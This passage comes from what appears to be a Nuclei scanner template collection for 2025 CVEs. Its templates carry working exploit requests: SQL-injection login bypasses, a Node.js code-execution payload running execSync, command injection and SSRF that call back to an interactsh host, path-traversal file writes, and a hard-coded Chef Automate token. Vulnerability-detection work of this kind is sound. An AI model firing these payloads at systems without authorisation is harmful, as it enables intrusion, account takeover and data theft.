Unauthenticated attackers can access sensitive information about password-protected vendors or venues.\n  remediation: |\n    Update to the latest version beyond 6.15.2\n  reference:\n    - https://www.wiz.io/vulnerability-database/cve/cve-2025-9808\n    - https://wpscan.com/plugin/the-events-calendar/\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar\n    - https://wordpress.org/plugins/the-events-calendar/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-9808\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.html:\"/wp-content/plugins/the-events-calendar/\"\n    fofa-query: body=\"/wp-content/plugins/the-events-calendar/\"\n    publicwww-query: \"/wp-content/plugins/the-events-calendar/\"\n  tags: cve,cve2025,wordpress,wp-plugin,wpscan,the-events-calendar,unauth,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/tribe/events/v1/organizers\"\n      - \"{{BaseURL}}/wp-json/tribe/events/v1/venues\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body,\"rest_url\",\"total\")'\n          - 'contains_any(body,\"organizers\",\"venues\")'\n          - 'contains(header,\"application/json\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        name: organizer_data\n        group: 1\n        regex:\n          - '\"organizers\":\\[(.*?)\\],\"rest_url\"'\n\n      - type: regex\n        part: body\n        name: venue_data\n        group: 1\n        regex:\n          - '\"venues\":\\[(.*?)\\],\"rest_url\"'\n# digest: 4a0a0047304502201673a52f687efaa722968308d3f40ee35d3ffb5462cc28f1eff5137360aece08022100feab62f99f297b44e62813b3e160ec5047e4b1c7fa213309c7312e3fb14ed903:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-9808.yaml","vuln_id":"cve-2025-9808"},{"raw":"id: CVE-2025-9744\n\ninfo:\n  name: Loan Management System 1.0 - SQL Injection\n  author: arafatansari\n  severity: critical\n  description: |\n    Loan Management System 1.0 contains a SQL injection vulnerability via the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Unauthenticated attackers can bypass authentication and gain full administrative access through SQL injection in the username parameter, potentially compromising the entire loan management system.\n  remediation: |\n    Upgrade Loan Management System to a patched version that properly sanitizes user input in authentication handling.\n  reference:\n    - https://www.exploit-db.com/exploits/50402\n    - https://packetstormsecurity.com/files/167860/Loan-Management-System-1.0-SQL-Injection.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-9744\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10\n    cve-id: CVE-2025-9744\n    epss-score: 0.01806\n    epss-percentile: 0.77604\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 2\n  tags: cve,cve2025,auth-bypass,cms,packetstorm,edb,loancms,sqli,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /ajax.php?action=login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}\n      - |\n        GET /index.php?page=home HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'window.start_load'\n          - 'Welcome back Admin'\n          - 'Loan Management System'\n        condition: and\n\n      - type: word\n        part: body\n        words:\n          - 'login-form'\n        negative: true\n# digest: 4b0a00483046022100b54c4f7e6f9240b8a78f9c2da3f28e6fabc7bd8e6c25929b67a4be5610d124e3022100ca02809df1ccbf247f0bed05f20cfa9fdfc701a56e6a298e74f661fc4b5e0e92:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-9744.yaml","vuln_id":"cve-2025-9744"},{"raw":"id: CVE-2025-9316\n\ninfo:\n  name: N-central - Authentication Bypass\n  author: DhiyaneshDK,horizon3ai\n  severity: medium\n  description: |\n    N-central < 2025.4 can generate sessionIDs for unauthenticated users This issue affects N-central: before 2025.4.\n  impact: |\n    Attackers can hijack sessions without authentication, potentially leading to unauthorized access.\n  remediation: |\n    Update to version 2025.4 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-9316\n    - https://github.com/horizon3ai/n-able_n-central_xxe_file_read/blob/main/ncentral_xxe_file_read.py\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.title:\"N-central Login\"\n  tags: cve,cve2025,n-central,session-leak,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /dms/services/ServerUI HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml\n        Soapaction: \"\"\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n          <soapenv:Body>\n            <sessionHello>\n              <applianceID>3</applianceID>\n            </sessionHello>\n          </soapenv:Body>\n        </soapenv:Envelope>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"SessionID\"\n          - \"sessionHelloResponse\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '<SessionID[^>]*>(\\d+)</SessionID>'\n          - '<sessionId>(\\d+)</sessionId>'\n          - '<sessionID>(\\d+)</sessionID>'\n# digest: 4b0a004830460221009b2267e6be4ae28edcd7c641c2f18318f171a848eb4f68744c7ac4c2e9615b470221009b493a7bc2cfe87ff3ae3c15feaf4a4e90f18e9d934d1ca433da910f206c456a:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-9316.yaml","vuln_id":"cve-2025-9316"},{"raw":"id: CVE-2025-9209\n\ninfo:\n  name: RestroPress 3.0.0-3.2.1 - Authentication Bypass\n  author: 0x_Akoko\n  severity: critical\n  description: |\n   RestroPress Online Food Ordering System WordPress plugin 3.0.0 to 3.1.9.2 contains an authentication bypass caused by exposure of user private tokens and API data via /wp-json/wp/v2/users endpoint, letting unauthenticated attackers forge JWT tokens and authenticate as other users including administrators, exploit requires no authentication.\n  impact: |\n   Unauthenticated attackers can forge JWT tokens and authenticate as any user, including administrators, leading to full account takeover.\n  remediation: |\n   Update to the latest version beyond 3.1.9.2.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/restropress/restropress-online-food-ordering-system-300-3192-unauthenticated-information-exposure-to-authentication-bypass-via-forged-jwt\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-9209\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-9209\n    epss-score: 0.02334\n    epss-percentile: 0.82813\n    cwe-id: CWE-287\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: http.html:\"/wp-content/plugins/restropress/\"\n    fofa-query: body=\"/wp-content/plugins/restropress/\"\n  tags: cve,cve2025,wordpress,wp,wp-plugin,restropress,auth-bypass\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/restropress/readme.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"RestroPress\")'\n          - 'compare_versions(version, \">= 3.0.0\", \"<= 3.2.1\")'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: version\n        group: 1\n        regex:\n          - '(?i)Stable tag:\\s*([0-9.]+)'\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-json/rp/v1/auth?user_id=1 HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: probe-{{randstr}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"\\\"token\\\":\\\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        part: body\n        name: jwt_token\n        group: 1\n        regex:\n          - '\"token\"\\s*:\\s*\"(eyJ[A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+\\.[A-Za-z0-9_\\-]+)\"'\n# digest: 4b0a00483046022100d328a099cc7a3309edd5ecbd95dc4520efd58d14f3f858909f5f9734c26790af022100deeabf8a2f6b4b53fece5a9cc984235e731415a8e9502b960385c26ef362ea0b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-9209.yaml","vuln_id":"cve-2025-9209"},{"raw":"id: CVE-2025-9196\n\ninfo:\n  name: Trinity Audio <= 5.21.0 - Information Exposure\n  author: Kazgangap\n  severity: medium\n  description: |\n    The Trinity Audio Text to Speech AI audio player to convert content into audio plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.21.0 via the ~/admin/inc/phpinfo.php file that gets created on install. This makes it possible for unauthenticated attackers to extract sensitive data including configuration data.\n  impact: |\n    Unauthenticated attackers can extract sensitive configuration data, potentially aiding further attacks.\n  remediation: |\n    Update to the latest version beyond 5.21.0.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/trinity-audio/trinity-audio-5210-unauthenticated-information-exposure\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-9196\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2025-9196\n    cwe-id: CWE-200\n    epss-score: 0.01005\n    epss-percentile: 0.61485\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: sergiotrinity\n    product: trinity-audio\n    framework: wordpress\n    fofa-query: body=\"/wp-content/plugins/trinity-audio\"\n  tags: cve,cve2025,wp-plugin,wordpress,trinity-audio,exposure,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/trinity-audio/admin/inc/phpinfo.php HTTP/1.1\n        Host: {{Hostname}}\n\n    host-redirects: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"PHP Version\", \"PHP Extension\",\"trinity-audio\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a0047304502207869b60ff885bee6cabe3a736a626c11454406da02e08f09751db5ad7309a4bc02210085a7ffcb476abcb4d75ed320d0ca4049d085c0f0732c22068f6312183df23a59:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-9196.yaml","vuln_id":"cve-2025-9196"},{"raw":"id: CVE-2025-8943\n\ninfo:\n  name: Flowise < 3.0.1 - Remote Command Execution\n  author: zezezez\n  severity: critical\n  description: |\n    The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands.\n  impact: |\n    Successful exploitation allows attackers to execute arbitrary OS commands on the target server, potentially leading to complete system compromise, data theft, and lateral movement within the network.\n  remediation: |\n    Update Flowise to the latest version that addresses this vulnerability. Implement proper input validation and sanitization for the customMCP endpoint parameters.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-8943\n    - https://www.cve.org/CVERecord?id=CVE-2025-8943\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-8943\n    epss-score: 0.65771\n    epss-percentile: 0.99233\n    cwe-id: CWE-78\n    cpe: cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: flowiseai\n    product: flowise\n    shodan-query: http.title:\"Flowise\"\n  tags: cve,cve2025,rce,flowise,oast,fictional,vkev,ai,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/node-load-method/customMCP HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-request-from: internal\n\n        {\n            \"inputs\": {\n                \"mcpServerConfig\": {\n                    \"command\": \"ping\",\n                    \"args\": [\n                        \"{{interactsh-url}}\",\n                        \"-c\",\n                        \"4\"\n                    ]\n                }\n            },\n            \"loadMethod\": \"listActions\"\n        }\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains_all(body, \"No Available Actions\", \"label\\\":\")'\n          - 'contains_any(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022003416e4d59dea6f588fb3f590ec145f598d1c33a2db6b03747bd5bb1494d2eec022100b1757a4f5750052b691fbe22663270843738f81e8479922819ba1f9f40280335:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-8943.yaml","vuln_id":"cve-2025-8943"},{"raw":"id: CVE-2025-8868\n\ninfo:\n  name: Chef Automate < 4.13.295 — SQL Injection\n  author: 3th1c_yuk1,xbow\n  severity: critical\n  description: |\n    In Progress Chef Automate, versions earlier than 4.13.295, on Linux x86 platform, an authenticated attacker can gain access to Chef Automate restricted functionality in the compliance service via improperly neutralized inputs used in an SQL command using a well-known token.\n  impact: |\n    Authenticated attackers with knowledge of a well-known token can execute arbitrary SQL queries through the compliance service, potentially gaining access to restricted functionality and sensitive data.\n  remediation: |\n    Upgrade to version 4.13.295 or later.\n  reference:\n    - https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-8868\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-8868\n    epss-score: 0.24317\n    epss-percentile: 0.9776\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"Chef Automate\"\n  tags: cve,cve2025,chef,automate,sqli,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/v0/compliance/profiles/search HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506\n\n        {\"filters\": [{\"type\": \"name'\", \"values\": [\"test\"]}]}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"status_code == 500\"\n          - \"contains(body, 'pq: syntax error')\"\n          - \"contains(content_type, 'application/json')\"\n        condition: and\n# digest: 4b0a00483046022100c6f0eee40017faba180e953a1533007c9c26d50d4f35cca4e9da80d179faf4a1022100c021fe2bf0c4460bf9a7dc2ebd2ee7796010c44999f25471671c11ddcf281e2d:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-8868.yaml","vuln_id":"cve-2025-8868"},{"raw":"id: CVE-2025-8848\n\ninfo:\n  name: LibreChat <= 0.7.9 - HTML Injection via Accept-Language Header\n  author: Kazgangap\n  severity: medium\n  description: |\n    danny-avila/librechat 0.7.9 contains a stored XSS caused by improper sanitization of the Accept-Language header, letting logged-in users inject arbitrary HTML into the html lang= tag, exploit requires user to be logged in.\n  impact: |\n    Logged-in attackers can inject arbitrary HTML leading to cross-site scripting attacks, potentially compromising user sessions or data.\n  remediation: |\n    Update to the latest version where this issue is fixed.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-8848\n    - https://huntr.com/bounties/a05ebc1f-882a-4adc-b178-d3cefa4b730e\n    - https://github.com/danny-avila/LibreChat\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 5.4\n    cve-id: CVE-2025-8848\n    epss-score: 0.00453\n    epss-percentile: 0.38665\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: app=\"LibreChat\"\n  tags: cve,cve2025,librechat,html-injection,vuln\n\nvariables:\n  marker: \"{{rand_base(20)}}\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n    headers:\n      Accept-Language: \"<h3>{{marker}}</h3>\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - '<html lang=\"<h3>{{marker}}</h3>\">'\n          - 'LibreChat'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100e96bac8e38f5e0cef529b384dedd77f1e375a9da39d7ce83c07693bfcf2b18c302205cab1bcb9d2f6e36c10a2cf99562e041e9abe6f9be03034a5eadaa65aaa3bcc1:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-8848.yaml","vuln_id":"cve-2025-8848"},{"raw":"id: CVE-2025-8266\n\ninfo:\n  name: ChanCMS <= 3.1. - Remote Code Execution\n  author: Ark\n  severity: critical\n  description: |\n    yanyutao0402 ChanCMS <= 3.1.2 contains an insecure deserialization caused by manipulation of the \\\"targetUrl\\\" argument in getArticle function of app/modules/cms/controller/collect.js, letting remote attackers execute arbitrary code, exploit requires crafted input.\n  impact: |\n    Remote attackers can execute arbitrary code, potentially leading to full system compromise.\n  remediation: |\n    Upgrade to version 3.1.3.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-8266\n    - https://github.com/advisories/GHSA-pg2f-hfwm-m7g5\n    - https://avd.aliyun.com/detail?id=AVD-2025-8266\n    - https://dbugs.ptsecurity.com/vulnerability/PT-2025-31058\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"ChanCMS\"\n  tags: cve,cve2025,chancms,rce,deserialization,intrusive,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /cms/gather/getArticle?targetUrl=http://jsonplaceholder.typicode.com/posts/1&parseData=return+process.mainModule.require(%27child_process%27).execSync(%27id%27).toString() HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"uid=\", \"gid=\", \"groups=\")'\n          - 'contains(header, \"ChanCMS\")'\n        condition: and\n# digest: 4b0a00483046022100a8ae1b283e8bdf44fdf0aca7a35c3b59fc17bf33d58fc21198c9a5347d57361c022100d092f45e04766a24f2ac8a312b485818500667e224779ba4b131bdec770bd277:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-8266.yaml","vuln_id":"cve-2025-8266"},{"raw":"id: CVE-2025-8110\n\ninfo:\n  name: Gogs <= 0.13.3 - Remote Code Execution\n  author: rxerium\n  severity: high\n  description: |\n    Gogs self-hosted Git service versions 0.13.3 and earlier contain a critical symlink bypass vulnerability that circumvents the fix for CVE-2024-55947. Authenticated users can exploit improper symbolic link handling in the PutContents API to overwrite files outside the repository by committing a symlink pointing to sensitive targets, leading to remote code execution. As of December 2025, this remains an unpatched zero-day with active exploitation ongoing. Approximately 1,400 exposed Gogs instances exist, with over 700 showing signs of compromise. The vulnerability stems from the API writing to file paths without checking if targets are symlinks pointing outside the repository. Gogs maintainers are working on a fix.\n  remediation: |\n    Update to the latest version of Gogs.\n  impact: |\n    Local attackers can execute arbitrary code, potentially leading to full system compromise.\n  reference:\n    - https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit\n    - https://thehackernews.com/2025/12/unpatched-gogs-zero-day-exploited.html\n    - https://github.com/advisories/ghsa-mq8m-42gh-wq7r\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-8110\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2025-8110\n    epss-score: 0.82471\n    epss-percentile: 0.99649\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    vendor: gogs\n    product: gogs\n    max-request: 1\n    shodan-query: http.title:\"Sign In - Gogs\"\n  tags: cve,cve2025,gogs,git,symlink,rce,kev,vkev,passive,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/user/login\"\n\n    extractors:\n      - type: regex\n        name: version\n        group: 1\n        regex:\n          - 'Gogs Version: ([0-9.]+)'\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"Sign In - Gogs: Go Git Service\")'\n          - 'compare_versions(version, \"<= 0.13.3\")'\n        condition: and\n# digest: 4a0a00473045022100812828f52f38726ccd35c0986da0f5b505b9ed3acefa9afdd3024cd52676407d0220435dc428532300d5d35b1193ac79592d2a4e594efb2f2a3fa5c186db66d2f5c1:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-8110.yaml","vuln_id":"cve-2025-8110"},{"raw":"id: CVE-2025-8085\n\ninfo:\n  name: Ditty < 3.1.58 - Server-Side Request Forgery\n  author: s4e-io\n  severity: high\n  description: |\n    The plugin lacks authorization and authentication for requests to its displayItems endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs. v3.1.57 attempted to fix the issue with a nonce check, however any authenticated users, such as subscriber can retrieve it.\n  impact: |\n    Unauthenticated attackers can force the server to make requests to arbitrary URLs through the displayItems endpoint, potentially accessing internal services and exposing sensitive data.\n  remediation: |\n    Upgrade Ditty WordPress plugin to version 3.1.58 or later that implements proper authorization checks on the displayItems endpoint.\n  reference:\n    - https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-8085\n    - https://research.cleantalk.org/cve-2025-8085/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.html:\"/wp-content/plugins/ditty-news-ticker/\"\n    fofa-query: body=\"/wp-content/plugins/ditty-news-ticker/\"\n    publicwww-query: \"/wp-content/plugins/ditty-news-ticker/\"\n  tags: cve,cve2025,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,metaphorcreations,vuln,vkev\n\nvariables:\n  marker_string: \"{{rand_text_alpha(5)}}\"\n  marker_int: \"{{rand_int(1000, 9999)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-json/dittyeditor/v1/displayItems HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\n          \"apiData\": {\n            \"layouts\": [\n              {\n                \"id\": \"{{marker_string}}\",\n                \"html\": \"{image default_src=\\\"http://{{interactsh-url}}\\\"}\",\n                \"css\": \"{{marker_string}}\"\n              }\n            ],\n            \"items\": [\n              {\n                \"item_id\": \"{{marker_int}}\",\n                \"item_type\": \"default\",\n                \"item_value\": { \"content\": \"{{marker_string}}\" },\n                \"layout_value\": { \"default\": \"{{marker_string}}\" }\n              }\n            ]\n          }\n        }\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"http\")'\n          - 'contains_all(body, \"{{marker_string}}\", \"{{marker_int}}\")'\n          - \"status_code == 200\"\n        condition: and\n# digest: 490a00463044022052caf6f82861cd0c1b68e9d23ca0cdf6b0e32b5866f7c50a615d2ab62ce7526c02201187b027b695e734c0d370abfdecbdabe0e29660ab8058f9a243c4e5246c021f:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-8085.yaml","vuln_id":"cve-2025-8085"},{"raw":"id: CVE-2025-7160\n\ninfo:\n  name: Zoo Management System 1.0 - SQL Injection\n  author: arafatansari\n  severity: critical\n  description: |\n    Zoo Management System 1.0 contains a SQL injection vulnerability via the username parameter on the login page. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n  impact: |\n    Unauthenticated attackers can bypass authentication and execute arbitrary SQL queries through the username parameter, potentially gaining full administrative access and extracting sensitive database information.\n  remediation: |\n    Upgrade Zoo Management System to a patched version that properly sanitizes user input in the login form.\n  reference:\n    - https://www.exploit-db.com/exploits/48880\n    - https://packetstormsecurity.com/files/167572/Zoo-Management-System-1.0-Cross-Site-Scripting.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-7160\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10\n    cve-id: CVE-2025-7160\n    epss-score: 0.01776\n    epss-percentile: 0.77231\n    cwe-id: CWE-89\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2025,edb,packetstorm,zms,sqli,auth-bypass,cms,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /admin/index.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        username=admin%27+or+%271%27%3D%271&password=any&login=\n\n    host-redirects: true\n    max-redirects: 2\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'ZMS ADMIN'\n          - 'Dashboard'\n          - 'Zoo Management System'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100b4ce95d5faf36585bf48616afbc6048ececeaf6ce8f161e6458559a4d5b54a9402204890e029aa28a3142c2e8ca1d44af22d9ddb19aa555971d88477ef5bae58bd6b:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-7160.yaml","vuln_id":"cve-2025-7160"},{"raw":"id: CVE-2025-71334\n\ninfo:\n  name: Flowise - Path Traversal\n  author: theamanrawat\n  severity: critical\n  description: |\n    Flowise <= 2.2.8 contains a path traversal vulnerability caused by missing validation of chatflowId and chatId parameters in file handling, letting unauthenticated attackers read and write arbitrary files, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can read and write arbitrary files, potentially leading to remote code execution and full system compromise.\n  remediation: |\n    Update to version 3.0.6 or later.\n  reference:\n    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-71334\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-71334\n    epss-score: 0.0436\n    epss-percentile: 0.90811\n    cwe-id: CWE-73\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: flowiseai\n    product: flowise\n    shodan-query: title:\"Flowise\"\n    fofa-query: title=\"Flowise\"\n    censys-query: services.http.response.html_title=\"Flowise\"\n  tags: cve,cve2025,flowise,lfi,path-traversal,file-write,vkev,intrusive\n\nvariables:\n  name: \"{{randstr}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/\"\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"Flowise\"\n        case-insensitive: true\n        internal: true\n\n  - method: POST\n    path:\n      - \"{{BaseURL}}/api/v1/chatflows\"\n\n    headers:\n      Content-Type: application/json\n      x-request-from: internal\n\n    body: |\n      {\"id\":\"../../../../../../../../tmp\",\"name\":\"{{name}}\",\"deployed\":false,\"isPublic\":false,\"flowData\":\"{\\\"nodes\\\":[{\\\"id\\\":\\\"a\\\",\\\"data\\\":{\\\"category\\\":\\\"Document Loaders\\\",\\\"inputs\\\":{\\\"key\\\":\\\"data:text/plain;base64,bnVjbGVpLWN2ZS0yMDI1LTcxMzM0,a:{{name}}.txt\\\"}}}],\\\"edges\\\":[],\\\"viewport\\\":{\\\"x\\\":1,\\\"y\\\":1,\\\"zoom\\\":1}}\",\"chatbotConfig\":null,\"apiConfig\":null,\"analytic\":null,\"speechToText\":null,\"type\":\"CHATFLOW\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"FILE-STORAGE::\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '\\\\\"FILE-STORAGE::\\[\\\\\\\\\\\\\"(.*?)\\\\\\\\\\\\\"\\]\\\\\"'\n# digest: 4a0a0047304502207dfda77eeeed0ed3006c1b826f9afddaf43ab5bae338897c0cbdb0dd42aa2f75022100d7de970f68d29fc01770453c89f7054acff44713fad4021aa69dd92889ade009:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-71334.yaml","vuln_id":"cve-2025-71334"},{"raw":"id: CVE-2025-71324\n\ninfo:\n  name: Flowise - Path Traversal\n  author: theamanrawat,pdteam\n  severity: high\n  description: |\n    Flowise < 3.0.6 contains a path traversal vulnerability caused by improper validation of the chatId parameter in /api/v1/get-upload-file and /api/v1/openai-assistants-file/download endpoints, letting unauthenticated attackers read arbitrary files including sensitive database files.\n  impact: |\n    Unauthenticated attackers can read sensitive files, exposing database content and potentially compromising system confidentiality.\n  remediation: |\n    Update to version 3.0.6 or later.\n  reference:\n    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-99pg-hqvx-r4gf\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-71324\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-71324\n    epss-score: 0.0157\n    epss-percentile: 0.74274\n    cwe-id: CWE-73\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: FlowiseAI\n    product: Flowise\n    shodan-query: title:\"Flowise\"\n    fofa-query: title=\"Flowise\"\n  tags: cve,cve2025,flowise,lfi,path-traversal,unauth,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/vector/upsert/ HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n        ------WebKitFormBoundary7MA4YWxkTrZu0gW\n        